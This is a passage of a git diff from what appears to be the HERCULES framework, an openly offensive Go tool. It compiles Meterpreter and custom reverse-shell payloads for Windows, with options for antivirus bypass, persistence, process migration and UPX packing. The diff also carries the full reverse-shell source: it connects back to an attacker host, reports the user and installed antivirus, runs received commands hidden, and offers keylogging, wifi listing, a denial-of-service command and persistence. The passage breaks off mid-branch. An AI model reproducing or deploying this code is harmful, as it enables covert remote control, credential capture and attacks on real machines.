./Update") + Update.Stdout = os.Stdout + Update.Stderr = os.Stderr + Update.Start() + } else { + main() + } + } + } else { + BoldGreen.Println(Result) + time.Sleep(3 * time.Second) + main() + } + } else { + main() + } + +} + +func CheckSetup() bool { + + DirList, _ := exec.Command("sh", "-c", "cd $HERCULES_PATH/src && ls").Output() + GoVer, _ := exec.Command("sh", "-c", "go version").Output() + UPX, _ := exec.Command("sh", "-c", "upx").Output() + + if !(strings.Contains(string(DirList), "EGESPLOIT")) { + return false + } + + if !(strings.Contains(string(GoVer), "version")) { + return false + } + if !(strings.Contains(string(UPX), "Markus")) { + return false + } + return true +} + +func ChecVersion() string { + + Response, Error := http.Get("https://raw.githubusercontent.com/EgeBalci/HERCULES/master/SOURCE/HERCULES.go") + if Error != nil { + return "[!] ERROR : Connection attempt failed" + } + Body, _ := ioutil.ReadAll(Response.Body) + + Version := string(`"` + VERSION + `"`) + + if !(strings.Contains(string(Body), Version)) { + return "[!] New version detected" + } else { + return "[+] HERCULES is up to date" + } + +} + +func PrintBanner() { + color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ") + color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ") + color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ") + color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒") + color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒") + color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░") + color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░") + color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ") + color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") + color.Red(" ░ ") + +} + +func PrintCredit() { + Green := color.New(color.FgGreen) + BoldGreen := Green.Add(color.Bold) + color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]") + color.Green("+ -- --=[ Version: " + VERSION + " ]") + BoldGreen.Println("+ -- --=[ Ege Balcı ]") +} + +func Menu_1() { + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + White := color.New(color.FgWhite) + UnderlinedWhite := White.Add(color.Underline) + BoldYellow.Println("\n[1] GENERATE PAYLOAD ") + BoldYellow.Println("\n[2] BIND PAYLOAD ") + BoldYellow.Println("\n[3] UPDATE ") + + UnderlinedWhite.Print("\n\n[*] Select : ") +} + +func PrintPayloads() { + + White := color.New(color.FgWhite) + BoldWhite := White.Add(color.Bold) + Green := color.New(color.FgGreen) + BoldGreen := Green.Add(color.Bold) + + fmt.Println("\n") + BoldWhite.Println(" #===============================================================================#") + BoldWhite.Println(" | PAYLOAD | SIZE/UPX | AV Evasion Score |") + BoldWhite.Println(" |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~|") + BoldWhite.Print("(1) Meterpreter Reverse TCP | 946 KB / 262 KB | ") + BoldGreen.Print(" 8/10 ") + BoldWhite.Println("|") + BoldWhite.Println(" | | | |") + BoldWhite.Print("(2) Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") + BoldGreen.Print(" 8/10 ") + BoldWhite.Println("|") + BoldWhite.Println(" | | | |") + BoldWhite.Print("(3) Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") + BoldGreen.Print(" 8/10 ") + BoldWhite.Println("|") + BoldWhite.Println(" | | | |") + BoldWhite.Print("(4) HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") + BoldGreen.Print("7/10 ") + BoldWhite.Println("|") + BoldWhite.Println(" | | | |") + BoldWhite.Println(" #===============================================================================#") + fmt.Println("\n") +} + +func FinalView() { + Cyan := color.New(color.FgCyan) + BoldCyan := Cyan.Add(color.Bold) + Green := color.New(color.FgGreen) + BoldGreen := Green.Add(color.Bold) + Blue := color.New(color.FgBlue) + BoldBlue := Blue.Add(color.Bold) + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + Red := color.New(color.FgRed) + BoldRed := Red.Add(color.Bold) + White := color.New(color.FgWhite) + BoldWhite := White.Add(color.Bold) + ClearScreen() + PrintBanner() + + if Payload.Type == 1 { + BoldBlue.Println("#====================================================================================#") + BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") + BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") + BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ") + if Payload.Score < 5 { + BoldRed.Print(Payload.Score) + } else if Payload.Score == 5 { + BoldYellow.Print(Payload.Score) + } else { + BoldGreen.Print(Payload.Score) + } + if Payload.Score == 10 { + BoldGreen.Print("/10 ") + } else { + BoldGreen.Print("/10 ") + } + BoldBlue.Println("#") + BoldBlue.Println("#====================================================================================#") + } else if Payload.Type == 2 { + BoldBlue.Println("#====================================================================================#") + BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") + BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") + BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") + if Payload.Score < 5 { + BoldRed.Print(Payload.Score) + } else if Payload.Score == 5 { + BoldYellow.Print(Payload.Score) + } else { + BoldGreen.Print(Payload.Score) + } + if Payload.Score == 10 { + BoldGreen.Print("/10 ") + } else { + BoldGreen.Print("/10 ") + } + BoldBlue.Println("#") + BoldBlue.Println("#====================================================================================#") + } else if Payload.Type == 3 { + BoldBlue.Println("#====================================================================================#") + BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") + BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") + BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") + if Payload.Score < 5 { + BoldRed.Print(Payload.Score) + } else if Payload.Score == 5 { + BoldYellow.Print(Payload.Score) + } else { + BoldGreen.Print(Payload.Score) + } + if Payload.Score == 10 { + BoldGreen.Print("/10 ") + } else { + BoldGreen.Print("/10 ") + } + BoldBlue.Println("#") + BoldBlue.Println("#====================================================================================#") + } else if Payload.Type == 4 { + BoldBlue.Println("#====================================================================================#") + BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") + BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") + BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") + if Payload.Score < 5 { + BoldRed.Print(Payload.Score) + } else if Payload.Score == 5 { + BoldYellow.Print(Payload.Score) + } else { + BoldGreen.Print(Payload.Score) + } + if Payload.Score == 10 { + BoldGreen.Print("/10 ") + } else { + BoldGreen.Print("/10 ") + } + BoldBlue.Println("#") + BoldBlue.Println("#====================================================================================#") + } + + if Payload.Persistence == true { + BoldCyan.Print("\n[*] Persistence : ON") + BoldWhite.Print(" (") + BoldRed.Print("-2") + BoldWhite.Println(")") + } + if Payload.Migrate == true { + BoldCyan.Print("\n[*] Migration : ON") + BoldWhite.Print(" (") + BoldRed.Print("-1") + BoldWhite.Println(")") + } + + if Payload.UPX == true { + BoldCyan.Print("\n[*] UPX : ON") + BoldWhite.Print(" (") + BoldRed.Print("-3") + BoldWhite.Println(")") + } + + if Payload.Type == 1 { + if Payload.UPX == true && (Payload.Persistence || Payload.Migrate) { + BoldCyan.Println("\n[*] Payload Size : 326 KB") + } else if Payload.UPX == true && !(Payload.Persistence || Payload.Migrate) { + BoldCyan.Println("\n[*] Payload Size : 262 KB") + } else if Payload.UPX == false && !(Payload.Persistence || Payload.Migrate) { + BoldCyan.Println("\n[*] Payload Size : 946 KB") + } + + } else { + if Payload.UPX == true { + BoldCyan.Println("\n[*] Payload Size : " + Payload.UPX_Size) + } else { + BoldCyan.Println("\n[*] Payload Size : " + Payload.Size) + } + } + + PayloadName := strings.TrimSuffix(Payload.FileName, ".go") + + PayloadName += ".exe" + + BoldCyan.Println("\n[*] Payload saved at : /$HOME/" + PayloadName + "\n\n") + +} + +func CompilePayload() { + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + Red := color.New(color.FgRed) + Warning := Red.Add(color.Bold) + + Payload.FileName += ".go" + + File, _ := os.Create(Payload.FileName) + Source, _ := base64.StdEncoding.DecodeString(Payload.SourceCode) + var SourceCode string + + if Payload.Type == 2 || Payload.Type == 3 { + Address := string("\"http://" + Payload.Ip + ":" + Payload.Port + "/\"") + SourceCode = strings.Replace(string(Source), string("\"http://127.0.0.1:8080/\""), string(Address), -1) + if Payload.BypassAV == true { + SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) + SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1) + } + if Payload.Persistence == true { + SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", `import "EGESPLOIT/RSE"`, -1) + SourceCode = strings.Replace(string(SourceCode), "//RSE.Persistence()", "RSE.Persistence()", -1) + } + if Payload.Migrate == true { + SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) + SourceCode = strings.Replace(string(SourceCode), "//RSE.Migrate(Addr, len(Shellcode))", "RSE.Migrate(Addr, len(Shellcode))", -1) + } + + File.WriteString(SourceCode) + + BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) + BoldYellow.Println("\n[*] Compiling payload...") + BoldYellow.Println("\n[*] " + BuildCommand_Args) + BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) + BuildCommand.Stdout = os.Stdout + BuildCommand.Stderr = os.Stderr + BuildCommand.Run() + CleanFilesCommand := string("rm " + Payload.FileName) + exec.Command("sh", "-c", CleanFilesCommand).Run() + DirFiles, _ := exec.Command("sh", "-c", "ls").Output() + FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") + if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { + Warning.Println("\n[!] ERROR : Compile failed") + os.Exit(1) + } + File.Close() + MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") + exec.Command("sh", "-c", MovePayload).Run() + + } else if Payload.Type == 1 { + var IP string = "[4]byte{" + IP_Array := strings.Split(string(Payload.Ip), `.`) + for i := 0; i < 4; i++ { + if i == 3 { + IP += (IP_Array[i] + ",") + break + } + IP += (IP_Array[i] + "," + " ") + } + IP += "}}" + + SourceCode = strings.Replace(string(Source), `[4]byte{127,0,0,1}}`, IP, -1) + SourceCode = strings.Replace(string(SourceCode), `5555`, Payload.Port, -1) + if Payload.BypassAV == true { + SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) + SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1) + } + + if Payload.Persistence == true { + SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1) + SourceCode = strings.Replace(string(SourceCode), `//RSE.Persistence()`, `RSE.Persistence()`, -1) + } + if Payload.Migrate == true { + SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1) + SourceCode = strings.Replace(string(SourceCode), `//RSE.Migrate(Addr, int(Length_int))`, `RSE.Migrate(Addr, int(Length_int))`, -1) + } + + File.WriteString(SourceCode) + + BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) + BoldYellow.Println("\n[*] Compiling payload...") + BoldYellow.Println("\n[*] " + BuildCommand_Args) + BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) + BuildCommand.Stdout = os.Stdout + BuildCommand.Stderr = os.Stderr + BuildCommand.Run() + CleanFilesCommand := string("rm " + Payload.FileName) + exec.Command("sh", "-c", CleanFilesCommand).Run() + DirFiles, _ := exec.Command("sh", "-c", "ls").Output() + FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") + if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { + Warning.Println("\n[!] ERROR : Compile failed") + os.Exit(1) + } + File.Close() + MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") + exec.Command("sh", "-c", MovePayload).Run() + + } else if Payload.Type == 4 { + Payload.Ip = string(`"` + Payload.Ip + `"`) + Payload.Port = string(`"` + Payload.Port + `"`) + SourceCode = strings.Replace(string(Source), `"10.10.10.84"`, Payload.Ip, -1) + SourceCode = strings.Replace(string(SourceCode), `"5555"`, Payload.Port, -1) + + File.WriteString(SourceCode) + + BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) + BoldYellow.Println("\n[*] Compiling payload...") + BoldYellow.Println("\n[*] " + BuildCommand_Args) + BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) + BuildCommand.Stdout = os.Stdout + BuildCommand.Stderr = os.Stderr + BuildCommand.Run() + CleanFilesCommand := string("rm " + Payload.FileName) + exec.Command("sh", "-c", CleanFilesCommand).Run() + DirFiles, _ := exec.Command("sh", "-c", "ls").Output() + FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") + if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { + Warning.Println("\n[!] ERROR : Compile failed") + os.Exit(1) + } + File.Close() + MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") + exec.Command("sh", "-c", MovePayload).Run() + + } + +} + +func AskMigrate() { + Red := color.New(color.FgRed) + Warning := Red.Add(color.Bold) + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + BoldYellow.Print("\n[?] ") + fmt.Print("Do you want to add migration function to payload (y/n) :") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Warning.Print("\n[!] Adding migration will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Payload.Migrate = true + Payload.Score = (Payload.Score - 1) + } else { + Payload.Migrate = false + } + } else { + Payload.Migrate = false + } +} + +func AskPersistence() { + Red := color.New(color.FgRed) + Warning := Red.Add(color.Bold) + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + BoldYellow.Print("\n[?] ") + fmt.Print("Do you want to add persistence function to payload (y/n) :") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Warning.Print("\n[!] Adding persistence will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Payload.Persistence = true + Payload.Score = (Payload.Score - 2) + } else { + Payload.Persistence = false + } + } else { + Payload.Persistence = false + } +} + +func AskBypassAV() { + Red := color.New(color.FgRed) + Warning := Red.Add(color.Bold) + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + BoldYellow.Print("\n[?] ") + fmt.Print("Do you want to add Bypass AV function to payload (y/n) :") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Warning.Print("\n[!] Adding Bypass AV will increase the paylaod size, do you still want to continue (Y/n) :") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Payload.BypassAV = true + Payload.Score = (Payload.Score + 2) + } else { + Payload.BypassAV = false + } + } else { + Payload.BypassAV = false + } +} + +func AskUPX() { + Red := color.New(color.FgRed) + Warning := Red.Add(color.Bold) + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + BoldYellow.Print("\n[?] ") + fmt.Print("Do you want to compress the payload with UPX (y/n) :") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Warning.Print("\n[!] Compressing payloads with UPX decreases the AV Evasion Score, do you still want to continue (Y/n) :") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Payload.UPX = true + Payload.Score = (Payload.Score - 3) + ClearScreen() + PrintBanner() + + ExeName := strings.TrimSuffix(Payload.FileName, ".go") + ExeName += ".exe" + UPX_Command := string("upx --brute " + ExeName) + UPX := exec.Command("sh", "-c", UPX_Command) + UPX.Stdout = os.Stdout + UPX.Run() + } else { + Payload.UPX = false + } + } else { + Payload.UPX = false + } +} + +func ClearScreen() { + Clear := exec.Command("clear") + Clear.Stdout = os.Stdout + Clear.Run() +} + +func PreparePayload(No int) { + + Blue := color.New(color.FgBlue) + BoldBlue := Blue.Add(color.Bold) + Green := color.New(color.FgGreen) + BoldGreen := Green.Add(color.Bold) + Red := color.New(color.FgRed) + Warning := Red.Add(color.Bold) + + if No == 1 { + Payload.Type = 1 + Payload.Size = "946 KB" + Payload.FullSize = "1.1 MB" + Payload.MidSize = "326 KB" + Payload.UPX_Size = "262 KB" + Payload.Score = 8 + Payload.SourceCode = METERPRETER_TCP + + ClearScreen() + PrintBanner() + + BoldBlue.Println("#====================================================================================#") + BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") + BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") + BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ") + BoldGreen.Print(" 8/10 ") + BoldBlue.Println("#") + BoldBlue.Println("#====================================================================================#") + + for { + var IP string + fmt.Print("\n\n[*] Enter LHOST : ") + fmt.Scan(&IP) + if (len(IP) < 7) || (len(IP) > 15) { + Warning.Println("\n\n[!] ERROR : Invalid ip") + } else { + Payload.Ip = IP + break + } + + } + + for { + var PORT string + fmt.Print("\n[*] Enter LPORT : ") + fmt.Scan(&PORT) + _, err := strconv.Atoi(PORT) + if err == nil { + Payload.Port = PORT + break + } + Warning.Println("\n\n[!] ERROR : Invalid port") + + } + AskPersistence() + AskMigrate() + AskBypassAV() + + } else if No == 2 { + + Payload.Type = 2 + Payload.Size = "4.2 MB" + Payload.UPX_Size = "1.1 KB" + Payload.Score = 8 + Payload.SourceCode = METERPRETER_HTTP_HTTPS + + ClearScreen() + PrintBanner() + + BoldBlue.Println("#====================================================================================#") + BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") + BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") + BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") + BoldGreen.Print(" 8/10 ") + BoldBlue.Println("#") + BoldBlue.Println("#====================================================================================#") + + for { + var IP string + fmt.Print("\n\n[*] Enter LHOST : ") + fmt.Scan(&IP) + if (len(IP) < 7) || (len(IP) > 15) { + Warning.Println("\n\n[!] ERROR : Invalid ip") + } else { + Payload.Ip = IP + break + } + + } + + for { + var PORT string + fmt.Print("\n[*] Enter LPORT : ") + fmt.Scan(&PORT) + _, err := strconv.Atoi(PORT) + if err == nil { + Payload.Port = PORT + break + } + Warning.Println("\n\n[!] ERROR : Invalid port") + + } + + AskPersistence() + AskMigrate() + + } else if No == 3 { + Payload.Type = 3 + Payload.Size = "4.2 MB" + Payload.Score = 8 + Payload.SourceCode = METERPRETER_HTTP_HTTPS + + ClearScreen() + PrintBanner() + + BoldBlue.Println("#====================================================================================#") + BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") + BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") + BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") + BoldGreen.Print(" 8/10 ") + BoldBlue.Println("#") + BoldBlue.Println("#====================================================================================#") + + for { + var IP string + fmt.Print("\n\n[*] Enter LHOST : ") + fmt.Scan(&IP) + if (len(IP) < 7) || (len(IP) > 15) { + Warning.Println("\n\n[!] ERROR : Invalid ip") + } else { + Payload.Ip = IP + break + } + + } + + for { + var PORT string + fmt.Print("\n[*] Enter LPORT : ") + fmt.Scan(&PORT) + _, err := strconv.Atoi(PORT) + if err == nil { + Payload.Port = PORT + break + } + Warning.Println("\n\n[!] ERROR : Invalid port") + + } + + AskPersistence() + AskMigrate() + + } else if No == 4 { + Payload.Type = 4 + Payload.Size = "4.4 MB" + Payload.Score = 9 + Payload.SourceCode = HERCULES_REVERSE_SHELL + + ClearScreen() + PrintBanner() + + BoldBlue.Println("#====================================================================================#") + BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") + BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") + BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") + BoldGreen.Print("7/10 ") + BoldBlue.Println("#") + BoldBlue.Println("#====================================================================================#") + + for { + var IP string + fmt.Print("\n\n[*] Enter LHOST : ") + fmt.Scan(&IP) + if (len(IP) < 7) || (len(IP) > 15) { + Warning.Println("\n\n[!] ERROR : Invalid ip") + } else { + Payload.Ip = IP + break + } + + } + + for { + var PORT string + fmt.Print("\n[*] Enter LPORT : ") + fmt.Scan(&PORT) + _, err := strconv.Atoi(PORT) + if err == nil { + Payload.Port = PORT + break + } + Warning.Println("\n\n[!] ERROR : Invalid port") + + } + + } else { + + ClearScreen() + PrintBanner() + PrintPayloads() + + Warning.Println("\n[!] ERROR : Invalid choise\n") + + fmt.Print("\n\n[*] Select : ") + fmt.Scan(&NO) + + PreparePayload(NO) + + } + +} diff --git a/SOURCE/Payloads/HERCULES REVERSE SHELL.go b/SOURCE/Payloads/HERCULES REVERSE SHELL.go index c35f4b3..c2e757c 100644 --- a/SOURCE/Payloads/HERCULES REVERSE SHELL.go +++ b/SOURCE/Payloads/HERCULES REVERSE SHELL.go @@ -8,116 +8,99 @@ import "syscall" import "time" import "EGESPLOIT" - - const IP string = "10.10.10.84" const PORT string = "5555" -const BACKDOOR bool = false; -const EMBEDDED bool = false; -const TIME_DELAY time.Duration = 5;//Second +const BACKDOOR bool = false +const EMBEDDED bool = false +const TIME_DELAY time.Duration = 5 //Second const B64_BINARY string = "//INSERT-BINARY-HERE//" const BINARY_NAME string = "winupdt.exe" -var GLOBAL_COMMAND string; -var PARAMETERS string; -var KeyLogs string; - - +var GLOBAL_COMMAND string +var PARAMETERS string +var KeyLogs string func main() { - - if EMBEDDED == true { - EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS) - } - - - if BACKDOOR == true { - EGESPLOIT.Persistence() - } - - connect, err := net.Dial("tcp", IP+":"+PORT); - if err != nil { - time.Sleep(TIME_DELAY*time.Second); - main(); - }; - - - - Dir, Version, Username, AV := EGESPLOIT.Sysguide() - SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV) + "\n\n\n" + string(Dir) + ">") - connect.Write([]byte(string(SysGuide))); - - - - for { - - Command, _ := bufio.NewReader(connect).ReadString('\n'); - _Command := string(Command); - GLOBAL_COMMAND = _Command; - - - - if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") { - connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND))); - }else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") { - Temp_Address := strings.Split(_Command, "\"")//~meterpreter --tcp "127.0.0.1:4444" - Address := string(Temp_Address[1]) - ConType := strings.Split(_Command, " ") - ConType[1] = strings.TrimPrefix(ConType[1], "--") - EGESPLOIT.Meterpreter(ConType[1], Address) - connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n"+Dir+">")); - }else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") { - Temp_Address := strings.Split(_Command, "\"")//~migrate "127.0.0.1:4444" 1212 - Address := string(Temp_Address[1]) - Pid := strings.Split(_Command, " ") - Result, Error := EGESPLOIT.Migrate(Pid[2], Address) - if Result == true { - connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n"+Dir+">")); - }else{ - connect.Write([]byte("\n\n"+Error+"\n\n"+Dir+">")); - } - }else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") { - DOS_Command := strings.Split(GLOBAL_COMMAND, "\"") - var DOS_Target string = DOS_Command[1] - if strings.Contains(string(DOS_Target), "http") { - go EGESPLOIT.Dos(DOS_Target); - connect.Write([]byte("\n\n[*] Starting DOS atack..."+"\n\n[*] Sending 1000 request to "+DOS_Target+" !\n\n"+Dir+">")); - }else{ - connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n"+Dir+">")); - } - }else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") { - EGESPLOIT.Distrackt(); - }else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy"){ - go EGESPLOIT.Keylogger(&KeyLogs); - connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">"))); - }else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump"){ - Dump_Output := string("################## KEYLOGGER DUMP ##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n"+string(Dir)+">"); - connect.Write([]byte(Dump_Output)); - }else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") { - List := EGESPLOIT.WifiList(); - connect.Write([]byte(string(List))); - }else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") { - connect.Write([]byte(string(HELP+Dir+">"))); - }else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") { - go EGESPLOIT.Persistence(); - connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) +">")); - }else{ - cmd := exec.Command("cmd", "/C", _Command); - cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}; - out, _ := cmd.Output(); - Command_Output := string("\n\n"+string(out)+"\n"+string(Dir)+">"); - connect.Write([]byte(Command_Output)); - }; - }; -}; - - - - - + if EMBEDDED == true { + EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS) + } + + if BACKDOOR == true { + EGESPLOIT.Persistence() + } + + connect, err := net.Dial("tcp", IP+":"+PORT) + if err != nil { + time.Sleep(TIME_DELAY * time.Second) + main() + } + + Dir, Version, Username, AV := EGESPLOIT.Sysguide() + SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV) + "\n\n\n" + string(Dir) + ">") + connect.Write([]byte(string(SysGuide))) + + for { + + Command, _ := bufio.NewReader(connect).ReadString('\n') + _Command := string(Command) + GLOBAL_COMMAND = _Command + + if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") { + connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND))) + } else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") { + Temp_Address := strings.Split(_Command, "\"") //~meterpreter --tcp "127.0.0.1:4444" + Address := string(Temp_Address[1]) + ConType := strings.Split(_Command, " ") + ConType[1] = strings.TrimPrefix(ConType[1], "--") + EGESPLOIT.Meterpreter(ConType[1], Address) + connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n" + Dir + ">")) + } else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") { + Temp_Address := strings.Split(_Command, "\"") //~migrate "127.0.0.1:4444" 1212 + Address := string(Temp_Address[1]) + Pid := strings.Split(_Command, " ") + Result, Error := EGESPLOIT.Migrate(Pid[2], Address) + if Result == true { + connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n" + Dir + ">")) + } else { + connect.Write([]byte("\n\n" + Error + "\n\n" + Dir + ">")) + } + } else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") { + DOS_Command 